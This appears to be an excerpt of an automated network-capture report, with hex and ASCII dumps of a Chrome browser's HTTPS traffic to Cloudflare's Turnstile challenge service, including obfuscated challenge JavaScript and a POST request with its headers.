                                                                          2025-01-14 21:50:29 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22
                                                                          Data Ascii: 20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_footer_privacy"
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 2c 66 57 2c 66 58 2c 67 6e 2c 67 75 2c 67 79 2c 67 7a 2c 67 44 2c 67 45 2c 66 55 2c 66 56 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 32 36 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 32 30 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 34 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 31 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 36 33 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 37 32 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67
                                                                          Data Ascii: ,fW,fX,gn,gu,gy,gz,gD,gE,fU,fV){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1626))/1+-parseInt(gI(1020))/2*(-parseInt(gI(125))/3)+parseInt(gI(1014))/4*(parseInt(gI(1011))/5)+parseInt(gI(463))/6+-parseInt(gI(572))/7+-parseInt(g
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 75 72 6e 20 45 2b 46 7d 2c 27 70 74 43 59 48 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 3e 46 7d 2c 27 70 4e 4b 74 62 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 46 7d 2c 27 63 67 48 7a 70 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2a 46 7d 2c 27 57 70 64 6b 42 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 46 5e 45 7d 2c 27 50 56 6b 70 57 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 5e 46 7d 2c 27 74 69 79 74 75 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 46 5e 45 7d 2c 27 51 4a 76 45 41 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 5e 46 7d 2c 27 58 48 6d 48 6a 27 3a
                                                                          Data Ascii: urn E+F},'ptCYH':function(E,F){return E>F},'pNKtb':function(E,F){return E|F},'cgHzp':function(E,F){return E*F},'WpdkB':function(E,F){return F^E},'PVkpW':function(E,F){return E^F},'tiytu':function(E,F){return F^E},'QJvEA':function(E,F){return E^F},'XHmHj':
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 68 69 73 2e 67 5e 32 30 37 2e 38 34 5d 3d 55 2c 74 68 69 73 2e 68 5b 69 5b 67 4d 28 35 38 31 29 5d 28 34 32 2c 74 68 69 73 2e 67 29 5d 3d 56 2c 74 68 69 73 2e 68 5b 69 5b 67 4d 28 38 33 38 29 5d 28 32 32 2c 74 68 69 73 2e 67 29 5d 3d 57 2c 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 38 30 5d 3d 58 2c 74 68 69 73 2e 68 5b 32 30 36 2e 37 36 5e 74 68 69 73 2e 67 5d 3d 59 2c 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 38 39 5d 3d 5a 2c 74 68 69 73 2e 68 5b 31 33 33 2e 39 36 5e 74 68 69 73 2e 67 5d 3d 61 30 2c 74 68 69 73 2e 68 5b 69 5b 67 4d 28 38 33 38 29 5d 28 31 37 30 2c 74 68 69 73 2e 67 29 5d 3d 61 31 2c 74 68 69 73 2e 68 5b 69 5b 67 4d 28 32 32 36 29 5d 28 33 38 2c 74 68 69 73 2e 67 29 5d 3d 61 32 2c 74 68 69 73 2e 68 5b 69 5b 67 4d 28 37 33 37 29 5d 28 31
                                                                          Data Ascii: his.g^207.84]=U,this.h[i[gM(581)](42,this.g)]=V,this.h[i[gM(838)](22,this.g)]=W,this.h[this.g^80]=X,this.h[206.76^this.g]=Y,this.h[this.g^89]=Z,this.h[133.96^this.g]=a0,this.h[i[gM(838)](170,this.g)]=a1,this.h[i[gM(226)](38,this.g)]=a2,this.h[i[gM(737)](1
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 29 2b 31 35 5d 3d 61 39 2c 4a 3d 30 3b 4a 3c 61 61 5b 67 4d 28 31 31 33 29 5d 3b 4a 2b 3d 31 36 29 7b 66 6f 72 28 61 4c 3d 48 5b 30 5d 2c 4c 3d 48 5b 31 5d 2c 4d 3d 48 5b 32 5d 2c 4e 3d 48 5b 33 5d 2c 4f 3d 48 5b 34 5d 2c 50 3d 48 5b 35 5d 2c 51 3d 48 5b 36 5d 2c 52 3d 48 5b 37 5d 2c 4b 3d 30 3b 36 34 3e 4b 3b 4b 2b 2b 29 7b 28 53 3d 4b 2c 31 36 3e 4b 29 3f 54 3d 62 6c 5b 4b 2b 4a 5d 3a 54 3d 28 54 3d 49 5b 4b 2d 32 5d 2c 54 3d 62 4c 28 54 2c 31 37 29 5e 62 4d 28 54 2c 31 39 29 5e 54 3e 3e 3e 31 30 2c 54 3d 69 5b 67 4d 28 38 37 34 29 5d 28 62 4e 2c 54 2c 49 5b 69 5b 67 4d 28 39 35 32 29 5d 28 4b 2c 37 29 5d 29 2c 55 3d 49 5b 4b 2d 31 35 5d 2c 55 3d 69 5b 67 4d 28 35 35 35 29 5d 28 62 4f 28 55 2c 37 29 2c 62 50 28 55 2c 31 38 29 29 5e 55 3e 3e 3e 33 2e 31
                                                                          Data Ascii: )+15]=a9,J=0;J<aa[gM(113)];J+=16){for(aL=H[0],L=H[1],M=H[2],N=H[3],O=H[4],P=H[5],Q=H[6],R=H[7],K=0;64>K;K++){(S=K,16>K)?T=bl[K+J]:T=(T=I[K-2],T=bL(T,17)^bM(T,19)^T>>>10,T=i[gM(874)](bN,T,I[i[gM(952)](K,7)]),U=I[K-15],U=i[gM(555)](bO(U,7),bP(U,18))^U>>>3.1
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 32 30 33 29 5d 28 42 29 2c 44 3d 66 54 5b 67 4d 28 31 32 34 32 29 5d 28 43 29 5b 67 4d 28 31 34 31 34 29 5d 28 27 2b 27 2c 69 5b 67 4d 28 31 33 36 33 29 5d 29 2c 73 5b 67 4d 28 31 34 31 38 29 5d 28 69 5b 67 4d 28 31 33 33 30 29 5d 28 69 5b 67 4d 28 33 37 39 29 5d 28 27 76 5f 27 2c 65 4d 5b 67 4d 28 36 35 33 29 5d 5b 67 4d 28 31 37 34 29 5d 29 2b 27 3d 27 2c 44 29 29 7d 63 61 74 63 68 28 47 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 34 34 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 67 4e 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 76 2c 6f 29 7b 28 67 4e 3d 67 4a 2c 66 3d 7b 7d 2c 66 5b 67 4e 28 37 39 31 29 5d 3d 67 4e 28 31 31 39 33 29 2c 66 5b 67 4e 28 32 36 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 20 69 6e 73 74
                                                                          Data Ascii: 203)](B),D=fT[gM(1242)](C)[gM(1414)]('+',i[gM(1363)]),s[gM(1418)](i[gM(1330)](i[gM(379)]('v_',eM[gM(653)][gM(174)])+'=',D))}catch(G){}},eM[gJ(441)]=function(e,gN,f,g,h,i,j,k,l,m,n,v,o){(gN=gJ,f={},f[gN(791)]=gN(1193),f[gN(267)]=function(s,v){return s inst
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 36 35 29 5d 5b 67 50 28 32 31 31 29 5d 28 6b 5b 67 50 28 38 32 31 29 5d 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 51 3d 30 2c 65 54 3d 7b 7d 2c 65 54 5b 67 4a 28 31 30 35 30 29 5d 3d 65 53 2c 65 4d 5b 67 4a 28 31 35 32 30 29 5d 3d 65 54 2c 65 56 3d 65 4d 5b 67 4a 28 36 35 33 29 5d 5b 67 4a 28 31 36 32 30 29 5d 5b 67 4a 28 31 32 31 38 29 5d 2c 65 57 3d 65 4d 5b 67 4a 28 36 35 33 29 5d 5b 67 4a 28 31 36 32 30 29 5d 5b 67 4a 28 31 32 34 35 29 5d 2c 65 58 3d 65 4d 5b 67 4a 28 36 35 33 29 5d 5b 67 4a 28 31 36 32 30 29 5d 5b 67 4a 28 31 31 33 34 29 5d 2c 66 39 3d 21 5b 5d 2c 66 6c 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 36 38 38 29 5d 28 67 4a 28 31 31 30 35 29 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 68 46 2c 65 2c 66 2c 67 29 7b 68 46 3d 67 4a
                                                                          Data Ascii: 65)][gP(211)](k[gP(821)],e));return![]},eQ=0,eT={},eT[gJ(1050)]=eS,eM[gJ(1520)]=eT,eV=eM[gJ(653)][gJ(1620)][gJ(1218)],eW=eM[gJ(653)][gJ(1620)][gJ(1245)],eX=eM[gJ(653)][gJ(1620)][gJ(1134)],f9=![],fl=undefined,eM[gJ(688)](gJ(1105),function(d,hF,e,f,g){hF=gJ
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 66 53 5b 67 4a 28 37 35 32 29 5d 3d 66 6b 2c 66 53 5b 67 4a 28 31 33 38 34 29 5d 3d 66 68 2c 66 53 5b 67 4a 28 31 35 38 31 29 5d 3d 66 64 2c 66 53 5b 67 4a 28 31 31 32 33 29 5d 3d 66 63 2c 65 4d 5b 67 4a 28 33 34 34 29 5d 3d 66 53 2c 66 54 3d 66 75 6e 63 74 69 6f 6e 28 69 65 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 65 3d 67 4a 2c 64 3d 7b 27 76 5a 70 6b 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 27 68 55 51 4b 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 56 69 6f 6a 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 63 42 79 6b 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d
                                                                          Data Ascii: fS[gJ(752)]=fk,fS[gJ(1384)]=fh,fS[gJ(1581)]=fd,fS[gJ(1123)]=fc,eM[gJ(344)]=fS,fT=function(ie,d,e,f,g){return ie=gJ,d={'vZpkI':function(h,i){return i^h},'hUQKJ':function(h,i){return i&h},'ViojE':function(h,i){return h-i},'cBykv':function(h,i){return i!==h}
                                                                          2025-01-14 21:50:29 UTC1369INData Raw: 7d 2c 27 6c 6c 61 4a 6e 27 3a 69 65 28 36 35 39 29 2c 27 49 74 54 4f 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 62 5a 61 72 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 78 4d 6c 51 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 67 4e 45 59 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 4d 53 4d 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 49 6a 4e 70 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 61 47 64 63 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e
                                                                          Data Ascii: },'llaJn':ie(659),'ItTOM':function(h,i){return h==i},'bZarm':function(h,i){return i!=h},'xMlQR':function(h,i){return h(i)},'gNEYz':function(h,i){return h(i)},'xMSMk':function(h,i){return h!=i},'IjNpY':function(h,i){return i*h},'aGdcD':function(h,i){return


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.449767104.18.95.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:29 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 3155
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          CF-Chl-RetryAttempt: 0
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: 5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:29 UTC3155OUTData Raw: 76 5f 39 30 32 30 64 37 38 32 36 62 30 61 34 32 35 32 3d 44 78 67 4b 48 4b 58 4b 25 32 62 4b 79 4b 2d 52 4e 59 52 4e 41 4b 52 4c 68 30 75 32 4c 4e 74 52 5a 5a 4e 76 43 4e 68 39 4b 52 37 4e 51 4b 68 67 32 68 6a 37 67 4e 6f 62 37 4e 6c 38 52 70 44 4e 4d 4b 52 41 67 4e 68 69 35 78 56 55 4e 69 30 4e 33 4e 52 78 4e 69 67 6b 39 4e 43 4e 56 39 68 5a 4e 30 39 62 67 4e 2b 75 4c 56 32 6f 4e 46 6f 62 2d 4f 72 76 76 50 77 4e 78 33 39 56 47 4e 61 5a 59 24 77 6a 72 49 35 51 49 55 50 79 58 38 56 6a 49 69 75 67 4e 5a 39 4e 45 58 4b 56 6c 6b 4d 6e 47 4e 75 6a 4c 4e 51 32 4e 24 5a 58 77 34 59 4f 70 59 6e 33 68 59 2d 48 6d 74 33 65 78 36 4c 56 50 59 52 32 39 5a 6e 65 4a 67 36 76 4d 4e 56 35 4e 35 37 52 4e 68 59 35 57 59 62 30 39 38 72 76 46 39 39 4f 6c 4e 52 77 6b 4d 31 48
                                                                          Data Ascii: v_9020d7826b0a4252=DxgKHKXK%2bKyK-RNYRNAKRLh0u2LNtRZZNvCNh9KR7NQKhg2hj7gNob7Nl8RpDNMKRAgNhi5xVUNi0N3NRxNigk9NCNV9hZN09bgN+uLV2oNFob-OrvvPwNx39VGNaZY$wjrI5QIUPyX8VjIiugNZ9NEXKVlkMnGNujLNQ2N$ZXw4YOpYn3hY-Hmt3ex6LVPYR29ZneJg6vMNV5N57RNhY5WYb098rvF99OlNRwkM1H
                                                                          2025-01-14 21:50:30 UTC751INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:30 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 153004
                                                                          Connection: close
                                                                          cf-chl-gen: oZqk+0OXgso+ze9ecrze0wZDf4XtiHOKzqUt+hwncJFXf46fGiqJl4Ms/N3z5JXhf23IP2wePso1BkBOBWASApO1Beg9CrUp1pnL7yXbPTWDfsG+d080QVL0909a2gPrXhqr8dSYH9eLLVtSA1i78c55NpXsV8RsG6unxLB2qe6So28YcAyQFGmbWA+OFbj+dr5tlHoysnmK5x/5oAOTulpBu8kdONBD9j1yQzXXlPcePZHKm82wVleG95Vja1SXlSbxx6tLxjG9MLXzLG7bYUMVZyyEY92gtpq4DQFRk1BKujow92okdiQhgPyvsFKEanG/AOD3cVeH1COzx9BTWbtfeUqocRf/wIzImB4iTIU93d1bALA2T7IBdXAR55TtMpAxK/6/YPFeMmeCYc47OhDy6YHkpq3UqSoEwWcoYbiQOEmLmWGjKkU79KP6dLpnOA6RGCeFMeJmTehw1sOlyJGYVqeA31zOxcQ/SisDHiE=$v4K6fjL+dG2M57r3zH6qGA==
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d78d0850de9b-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:30 UTC618INData Raw: 58 59 68 6c 67 59 36 4c 64 59 64 37 6a 31 4f 4a 58 56 39 62 6c 31 32 66 70 5a 35 6c 6b 36 47 5a 6e 36 69 48 6d 59 42 68 72 6e 6c 79 6f 5a 53 6d 71 37 53 58 70 59 78 74 75 70 47 49 76 61 36 77 74 38 43 74 73 5a 69 31 75 59 43 46 74 34 57 35 6a 6f 2b 4c 79 6f 69 4a 6e 4b 61 57 31 36 62 46 6c 38 61 58 6c 35 72 4c 7a 64 6d 64 7a 39 33 55 6f 4c 33 48 35 39 2f 6e 35 64 6e 44 33 4f 6d 71 73 61 6e 74 72 72 54 6a 37 62 61 33 39 39 76 73 38 2f 76 39 37 64 54 5a 42 73 54 54 42 74 44 6e 32 65 7a 4b 43 4d 67 41 42 73 72 50 45 42 49 4b 30 78 51 4f 47 41 51 4c 37 68 73 59 48 53 44 76 4a 42 6a 64 46 66 6f 6b 4b 67 48 32 35 51 49 45 47 4f 66 74 36 42 30 6f 4b 43 34 69 38 52 49 78 4b 52 72 30 4f 43 41 76 2f 6a 30 54 4c 52 70 41 53 45 63 65 52 78 59 48 53 41 55 36 52 30 35
                                                                          Data Ascii: XYhlgY6LdYd7j1OJXV9bl12fpZ5lk6GZn6iHmYBhrnlyoZSmq7SXpYxtupGIva6wt8CtsZi1uYCFt4W5jo+LyoiJnKaW16bFl8aXl5rLzdmdz93UoL3H59/n5dnD3OmqsantrrTj7ba399vs8/v97dTZBsTTBtDn2ezKCMgABsrPEBIK0xQOGAQL7hsYHSDvJBjdFfokKgH25QIEGOft6B0oKC4i8RIxKRr0OCAv/j0TLRpASEceRxYHSAU6R05
                                                                          2025-01-14 21:50:30 UTC1369INData Raw: 74 62 58 55 4e 57 4a 32 51 6f 54 44 78 57 52 46 73 73 52 69 30 71 4e 48 45 77 4c 6a 52 34 59 33 4d 37 61 6b 5a 62 4f 32 4a 41 63 6d 56 58 51 59 46 45 50 33 4e 46 64 32 68 32 68 4a 42 4e 52 49 78 31 52 34 70 56 6a 70 70 6a 69 6c 75 4f 66 57 39 73 69 58 39 31 6c 6e 32 54 6a 32 69 6d 6c 57 70 6b 70 6f 35 73 62 70 71 54 73 4b 39 75 69 33 4b 56 68 49 69 74 64 62 71 4b 6e 4a 2b 71 6e 61 53 59 6a 61 4f 5a 71 4d 4f 68 76 63 47 39 69 72 71 47 30 4d 50 4b 69 73 48 52 30 5a 50 54 6b 70 47 78 7a 73 75 63 6d 4e 6e 4b 34 4e 6e 5a 33 71 48 65 30 65 4b 69 32 73 7a 6d 72 62 2b 70 35 76 4b 6d 38 4f 53 76 34 76 44 70 73 74 44 30 37 66 6a 55 2b 50 48 37 32 50 7a 31 2f 74 77 42 2b 51 4c 67 42 66 30 4e 35 41 6b 43 45 4f 67 4e 42 68 50 73 45 51 6f 57 38 42 55 4f 45 66 51 5a 45
                                                                          Data Ascii: tbXUNWJ2QoTDxWRFssRi0qNHEwLjR4Y3M7akZbO2JAcmVXQYFEP3NFd2h2hJBNRIx1R4pVjppjiluOfW9siX91ln2Tj2imlWpkpo5sbpqTsK9ui3KVhIitdbqKnJ+qnaSYjaOZqMOhvcG9irqG0MPKisHR0ZPTkpGxzsucmNnK4NnZ3qHe0eKi2szmrb+p5vKm8OSv4vDpstD07fjU+PH72Pz1/twB+QLgBf0N5AkCEOgNBhPsEQoW8BUOEfQZE
                                                                          2025-01-14 21:50:30 UTC1369INData Raw: 71 59 57 56 4c 56 6a 68 63 53 45 5a 66 55 6b 68 57 63 6d 68 73 54 46 74 6c 66 6c 42 66 61 58 4a 55 59 32 31 67 57 47 64 78 56 46 78 72 62 49 35 67 62 33 43 4b 55 6c 4e 55 55 49 31 33 6a 6e 5a 37 6d 33 69 55 6a 32 6d 4c 62 70 36 6a 6e 6f 4a 39 59 31 71 43 66 6d 61 43 68 6f 4f 4f 68 6f 71 48 6b 59 71 4f 69 35 53 4f 6b 6f 2b 58 6b 70 61 54 6d 70 61 61 6c 35 32 61 6e 70 75 67 6e 59 43 2b 75 70 32 4d 71 37 66 48 6b 4b 79 74 79 35 54 42 74 38 2b 59 77 38 6a 58 32 4c 48 5a 6e 37 69 77 33 39 44 64 6e 4b 43 33 35 61 6a 58 76 73 54 42 37 61 33 4b 75 72 33 44 33 61 6a 34 34 4e 72 4f 32 50 7a 71 39 73 36 35 37 75 73 46 77 77 54 6e 2b 77 49 42 78 67 63 4c 34 66 76 67 7a 73 2f 6e 33 41 66 53 2f 67 73 4f 44 2b 67 52 46 2b 2f 30 47 42 6f 62 37 66 55 67 34 74 67 6d 4a 43
                                                                          Data Ascii: qYWVLVjhcSEZfUkhWcmhsTFtlflBfaXJUY21gWGdxVFxrbI5gb3CKUlNUUI13jnZ7m3iUj2mLbp6jnoJ9Y1qCfmaChoOOhoqHkYqOi5SOko+XkpaTmpaal52anpugnYC+up2Mq7fHkKyty5TBt8+Yw8jX2LHZn7iw39DdnKC35ajXvsTB7a3Kur3D3aj44NrO2Pzq9s657usFwwTn+wIBxgcL4fvgzs/n3AfS/gsOD+gRF+/0GBob7fUg4tgmJC
                                                                          2025-01-14 21:50:30 UTC1369INData Raw: 61 47 46 75 53 47 78 6c 63 55 78 77 61 57 78 51 64 47 31 76 66 54 73 38 50 58 52 34 64 6e 5a 6c 66 6c 74 6c 67 47 46 66 52 6d 35 50 5a 4a 4a 77 53 34 74 54 5a 4a 71 49 56 32 68 56 69 46 74 73 57 59 4a 66 63 46 32 43 6d 36 53 64 5a 57 52 6d 71 57 32 65 71 6d 35 6b 62 5a 79 57 69 48 46 78 67 36 78 37 65 4c 57 49 71 36 69 57 6d 59 79 2f 6d 72 4f 6a 71 4d 43 6a 6f 37 2b 75 78 4c 72 41 72 70 32 69 6a 63 4b 2f 31 73 62 45 77 74 44 63 78 72 62 4d 74 64 4b 76 30 73 48 64 7a 74 58 49 31 73 48 6f 34 4d 76 68 72 2b 75 6e 33 4f 72 51 70 39 37 6d 37 65 33 71 38 76 72 51 74 2b 2f 31 7a 67 50 66 34 4e 54 2b 38 4e 66 70 2f 65 50 5a 78 41 48 47 79 50 73 46 37 41 54 56 44 4e 44 58 41 78 59 59 2f 52 62 5a 38 64 63 5a 45 69 44 34 48 52 59 6a 2f 43 45 61 4a 67 45 6c 48 69 45
                                                                          Data Ascii: aGFuSGxlcUxwaWxQdG1vfTs8PXR4dnZlfltlgGFfRm5PZJJwS4tTZJqIV2hViFtsWYJfcF2Cm6SdZWRmqW2eqm5kbZyWiHFxg6x7eLWIq6iWmYy/mrOjqMCjo7+uxLrArp2ijcK/1sbEwtDcxrbMtdKv0sHdztXI1sHo4Mvhr+un3OrQp97m7e3q8vrQt+/1zgPf4NT+8Nfp/ePZxAHGyPsF7ATVDNDXAxYY/RbZ8dcZEiD4HRYj/CEaJgElHiE
                                                                          2025-01-14 21:50:30 UTC1369INData Raw: 54 5a 36 62 33 64 53 65 54 6b 39 57 48 30 39 56 45 4a 30 55 6b 4e 47 68 58 39 4b 56 49 78 33 54 56 31 5a 66 56 31 63 67 6b 31 6c 59 55 74 59 6d 46 71 4d 61 6c 74 65 6a 32 4a 78 59 61 42 6b 6c 57 4b 5a 6f 35 70 72 67 35 65 65 69 4a 43 72 73 6f 69 43 71 72 61 4a 65 62 4e 30 65 6f 36 4d 6e 61 47 35 65 36 2b 73 6d 5a 57 6a 79 49 65 59 79 36 75 31 75 34 69 4f 6f 62 79 70 74 63 32 50 77 38 43 72 71 61 6e 56 31 71 6a 63 77 61 47 30 77 38 32 77 75 4d 66 49 36 72 7a 4c 7a 4f 61 75 72 37 43 73 36 64 50 71 30 74 66 33 31 50 44 72 78 64 62 65 31 4c 7a 38 32 74 61 2f 32 74 37 61 77 74 37 69 33 2b 72 68 78 41 76 2b 7a 41 72 4f 41 39 48 56 31 41 62 53 43 67 77 54 32 2f 4d 63 49 4e 73 4f 32 79 45 5a 38 78 72 6e 42 50 49 43 43 42 67 5a 35 77 49 4e 38 43 41 63 39 44 4c 77
                                                                          Data Ascii: TZ6b3dSeTk9WH09VEJ0UkNGhX9KVIx3TV1ZfV1cgk1lYUtYmFqMaltej2JxYaBklWKZo5prg5eeiJCrsoiCqraJebN0eo6MnaG5e6+smZWjyIeYy6u1u4iOobyptc2Pw8CrqanV1qjcwaG0w82wuMfI6rzLzOaur7Cs6dPq0tf31PDrxdbe1Lz82ta/2t7awt7i3+rhxAv+zArOA9HV1AbSCgwT2/McINsO2yEZ8xrnBPICCBgZ5wIN8CAc9DLw
